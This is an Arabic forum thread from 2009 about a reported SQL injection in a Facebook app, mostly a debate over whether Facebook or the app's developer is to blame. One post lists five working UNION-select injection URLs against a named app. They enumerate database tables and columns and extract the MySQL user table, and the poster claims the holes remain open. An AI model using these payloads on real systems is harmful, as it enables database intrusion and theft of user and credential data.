إختراق Facebook - Sql Injection

**MSH3AL** · 03-09-2009

الســـلام عليكم شباب,,,

كما عودناكم بأخبار قوية عن اختراقات لمواقع كبيرة مثل إختراق الياهو من قبل كم يوم,, واليوم اختراق الفيس بوك عن طريق الحقن السيكيول إنجكشن حاليا على موقعهم,,, بقسم التطبيقات.

طبعا قام المخترق بلمحاولة للإتصال بقسم الفيس بوك الفني لمعالجة الثغره لاكن مامن رد !!
شركة كبيرة تحتوي على 5 او 10 مليون مشترك لاترد على رسالة تحذير من ثغره قوية !! شي عجيب الصراحة,,,

لنشوف الصور للإختراق ,,

طبعا الثغره تسمح للمخترق بحقن قاعدة بياناتهم وإستخراج معلومات مهمة من عن طريق التلاعب بلروابط ( links ),,,

كما تم تحذير الفيس بوك من قبل بإختراقهم من قبل فريق روماني بإسم HackersBlog على الرابط التالي

Facebook hacked – sql injection

بلإضافة الى تحذير باحث امني لهم في البارحة من ثغرات لموقعهم ! ولا من مجيب ,,,

بصراحة الشركات هذه تحتاج طاقم فني متكامل للرد ومتابعة الLog عن طريق المود سيكيورتي ,,, هذا اقل شي لشركة كبيرة يفترض ان تدعي الحماية لأعضـــائها .

تحياتي
سيكيورتي رولز.

المصدر

**محمد كيوان** · 03-09-2009

الاختراق كان من امتي لـ امتي ؟

**عادل الظفيري** · 03-09-2009

اتوقع من الساعه

9 ونص وعشر ثواني الي 9 ونص وثلاثه عشر ثانية

**VOLVENO** · 03-09-2009

بصراحة الشركات هذه تحتاج طاقم فني متكامل للرد ومتابعة الLog عن طريق المود سيكيورتي ,,, هذا اقل شي لشركة كبيرة يفترض ان تدعي الحماية لأعضـــائها .

الشركات الكبيره على قولتك ماتستخدم المود سكيوريتي لأن هالأمور لي ولك

هالشركات عندها طواقم فنية متخصصه بالحماية وهالأمور .. ليست مثل المواقع والسيرفرات الشخصية

ماأقول أن حمايتهم تكون قمة في القوة .. لكن تحصل الإختراقات بين الحين والآخر

عموماً بس شي يقهر انهم ساحبين على اللي يحذرهم بوجود ثغره

وشكراً على الموضوع

سلام

**MSH3AL** · 03-09-2009

لو عندهم طاقم يخوي لي ماردوا للثغره ! وشو سبب وجودهم لو نسوا يردوا على ثغره تسحب معلومات السيرفر كامل فيها !! شي اكيد المخترق سحب معلومات الي يبيها قبل نشر الموضوع,, نظام الGrayHat معروف..

**Smart_Hacker** · 06-09-2009

هذا ال apps ما له علاقة بالفيس بوك ( هذا برنامج ) والاختراق اللي من هذا النوع بيتم اختراق سيرفر البرنامج الاصلي بكونو مركبين ال apps : (بتكون على استضافة صاحب البرنامج )
يعني لما يكون في SQL : بكون بالبرنامج الي على سيرفر صاحبو ولا شيء بطبق على الفيس بوك
واللي يقول كلام ثاني يكون ما يعرف راسه من رجليه

**MSH3AL** · 07-09-2009

اجل وش تسمي الapps.facebook ?? ماهو سب دومين لهم ؟ المفروض ثغرة سيكيول انجكشن سواء عادية او حقن يتم فحصها قبل تركيبها من قبل فريقهم الامني على الأقل !

**Smart_Hacker** · 07-09-2009

يا خي الapps برنامج لشخص اخر ( الفيس بوك ما له علاقة فيه ) والتطبيقات اللي بتم انا قلتلك ما بتم على هوست الفيس بوك ( بتم على هوست صاحب ال apps ) ارجو تكون المعلومة وصلتك وبالنسبة لكلامك انه يتم الفحص ( هذا خطأ المبرمج اللي عامل البرنامج .. الفيس بوك ما له علاقة )
واكيد الفيس بوك بفحص مجلداته وبرامجه بس مش مجبور يفحص البرامج اللي العالم تعلن عنها وتسوقها من خلال الفيس بوك

**MSH3AL** · 08-09-2009

كود:

http://apps.facebook.com/thealzheimersproject/tribute.php?tributeID=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

http://apps.facebook.com/thealzheimersproject/tribute.php?tributeID=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/pwd/*

http://apps.facebook.com/thealzheimersproject/tribute.php?tributeID=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,table_name,13,14,15/**/from/**/information_schema.tables/**/where/**/table_name/**/like/**/%27%25user%25%27/**/and/**/table_name/**/not/**/in/**/%28%27USER_PRIVILEGES%27%29/*

http://apps.facebook.com/thealzheimersproject/tribute.php?tributeID=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,column_name,13,14,15/**/from/**/information_schema.columns/**/where/**/table_name=%27user%27/**/and/**/column_name/**/not/**/in/**/%28%27ID%27,%27fbID%27,%27dateJoined%27,%27dateLeft%27,%27active%27,%27Host%27,%27User%27,%27Password%27,%27Select_priv%27,%27Insert_priv%27,%27Update_priv%27,%27Delete_priv%27,%27Create_priv%27,%27Drop_priv%27,%27Reload_priv%27,%27Shutdown_priv%27,%27Process_priv%27,%27File_priv%27,%27Grant_priv%27,%27References_priv%27,%27Index_priv%27,%27Alter_priv%27,%27Show_db_priv%27,%27Super_priv%27,%27Create_tmp_table_priv%27%29/*

http://apps.facebook.com/thealzheimersproject/tribute.php?tributeID=-1;%27%20union%20select%201,2,3,Host,5,6,7,8,9,10,11,12,13,14,15/**/from/**/user/*

By rEmOtEr

مازالت الثغرات موجودة !!

**WaLeeD** · 08-09-2009

الثغره في البرنامج

صاحب البرنامج هو من موجود فيها البق

اما الفيس بوك مالهم دخل حسب ما اعرف

**Mr.Ahmed EssAm** · 08-09-2009

المشاركة الأصلية كتبت بواسطة Smart_Hacker مشاهدة المشاركة

هذا ال apps ما له علاقة بالفيس بوك ( هذا برنامج ) والاختراق اللي من هذا النوع بيتم اختراق سيرفر البرنامج الاصلي بكونو مركبين ال apps : (بتكون على استضافة صاحب البرنامج )
يعني لما يكون في SQL : بكون بالبرنامج الي على سيرفر صاحبو ولا شيء بطبق على الفيس بوك
واللي يقول كلام ثاني يكون ما يعرف راسه من رجليه

:nice:

تسمى تطبيقات الفيس بوك تمكن المبرمج من ربط سكربت مع الفيس بوك وكانه احد تطبيقات الفيس بوك

يعني الاختراق الان لصاحب السكربت وليس الفيس بوك

حتى ان الثغره غبيه جدا فالمبرمج لم يؤمن مدخل الid وهو سهل جدا تامينه عن طريق الداله intval()

**Mr.Mido** · 27-09-2009

تطبيقات جوجل تعتمد على المبرمجين باستخدام api وليست تبع فيس بوك

المشكلة الحقيقية فعلا هى بطء تحميل فيس بوك على مدار الايام السابقة واوقات كثيرة يفتح بدون الcss هل هناك من يعانى من نفس المشكلة هنا ؟ قمت بالبحث ووجدت انها مشكلة عند العديد

**Fancy Qtr** · 27-09-2009

صح كلامك وانا بعد بدون ال css حزات

الموضوع: إختراق Facebook - Sql Injection

أدوات الموضوع

بحث في الموضوع

إختراق Facebook - Sql Injection

المواضيع المتشابهه

إختراق الفيس بوك بلإضافة الى إختراق حساب مبرمج الapps

إختراق الياهو - SQL Injection

SQL Injection

طريقة كشف وحل SQL Injection

خبراتكم مطلوبه في SQL injection

ضوابط المشاركة